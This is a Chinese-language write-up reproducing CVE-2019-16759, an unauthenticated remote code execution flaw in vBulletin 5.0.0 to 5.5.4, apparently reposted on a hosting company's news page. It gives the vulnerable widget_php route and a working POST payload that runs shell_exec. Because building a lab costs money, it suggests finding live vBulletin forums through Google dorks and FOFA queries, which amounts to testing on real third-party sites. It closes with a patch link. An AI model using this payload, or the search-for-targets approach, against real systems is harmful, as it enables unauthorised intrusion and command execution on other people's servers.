您好,登錄后才能下訂單哦!
vBulletin 5.x未授權(quán)RCE漏洞CVE-2019-16759復(fù)現(xiàn)分析,針對這個問題,這篇文章詳細(xì)介紹了相對應(yīng)的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。
0x00 簡介
vBulletin是一個收費(fèi)低廉但強(qiáng)大的建站BBS(論壇)CMS,該CMS國外大量論壇使用,中國國內(nèi)少許網(wǎng)站使用。近日,vBulletin 5.x爆出一個前臺遠(yuǎn)程代碼執(zhí)行漏洞,無需登錄即可觸發(fā)。該論壇程序在國外的國外的用戶量就類似dz論壇在國內(nèi)的用戶量。
0x01 漏洞概述
漏洞通過請求ajax/render/widget_php進(jìn)行模板注入觸發(fā)代碼執(zhí)行。
0x02 影響范圍
5.0.0 <= vBulletin <=5.5.4
0x03 環(huán)境搭建
自行搭建需要付費(fèi),因此這里使用google語法和FOFA查找
google語法:
site:*.vbulletin.net
Powered by vBulletin
FOFA:
content="vBulletin"
app="vBulletin"
在線靶場獲取方式
轉(zhuǎn)發(fā)本文至朋友圈并截圖發(fā)至公眾號內(nèi)即可
0x04 漏洞利用
進(jìn)入如下vBulletin論壇
訪問/index.php?routestring=ajax/render/widget_php會顯示以下結(jié)果
然后POST如下數(shù)據(jù)即可執(zhí)行命令whoami
widgetConfig[code] = echo shell_exec('whoami'); exit;
0x05 修復(fù)方式
安全更新補(bǔ)丁下載:
http://members.vbulletin.com/patches.php
關(guān)于vBulletin 5.x未授權(quán)RCE漏洞CVE-2019-16759復(fù)現(xiàn)分析問題的解答就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關(guān)注億速云行業(yè)資訊頻道了解更多相關(guān)知識。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。